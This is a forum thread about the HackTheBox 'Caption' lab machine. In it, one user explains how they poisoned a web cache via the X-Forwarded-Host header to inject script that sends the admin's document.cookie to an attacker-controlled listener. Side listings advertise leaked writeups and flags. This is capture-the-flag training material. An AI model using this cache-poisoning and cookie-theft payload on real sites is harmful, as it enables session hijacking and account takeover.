01-12-2025, 02:57 AM
|
HTB Caption - Linux - Hard
by mhsoraa - Saturday September 14, 2024 at 06:31 PM
|
|
01-24-2025, 10:20 PM
(01-12-2025, 02:57 AM)BlackBeer Wrote:(11-29-2024, 05:34 PM)cutearmadillo Wrote: You use cache poisoning to insert malicious javascript into the page I'm not sure if i can atm, cause im at work and using a VM. but I sent the request when i first traversed to the /Firewalls page to repeater in burp and set up a listener: python3 -m http.server {listenerport} then sent ``` X-Forwarded-Host: 127.0.0.1"> </script> <script src="http://LOCALIP:LPORT/exploit.js"></script> <!-- ``` with the script containing ``` X-Forwarded-Host: 127.0.0.1"> </script> <script>new Image().src="http://LOCALIP:LPORT/?c="+encodeURI(document.cookie);</script><!-- ``` Then waited for my listener to catch the admin's cookie via the .js script that had been placed in the webcache Hope this helps, ping me later if it doesnt and i'll see if i can do any more |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 360 | 88,710 |
03-28-2026, 09:28 AM Last Post: |
||
| [FREE] HTB-ProLabs APTLABS Just Flags | 23 | 2,348 |
03-28-2026, 03:30 AM Last Post: |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 87 | 7,490 |
03-27-2026, 07:22 PM Last Post: |
||
| HTB Eloquia User and Root Flags - Insane Box | 13 | 350 |
03-27-2026, 06:14 PM Last Post: |
||
| HTB - ALL Challenges you Stuck in | 2 | 646 |
03-27-2026, 04:24 PM Last Post: |
||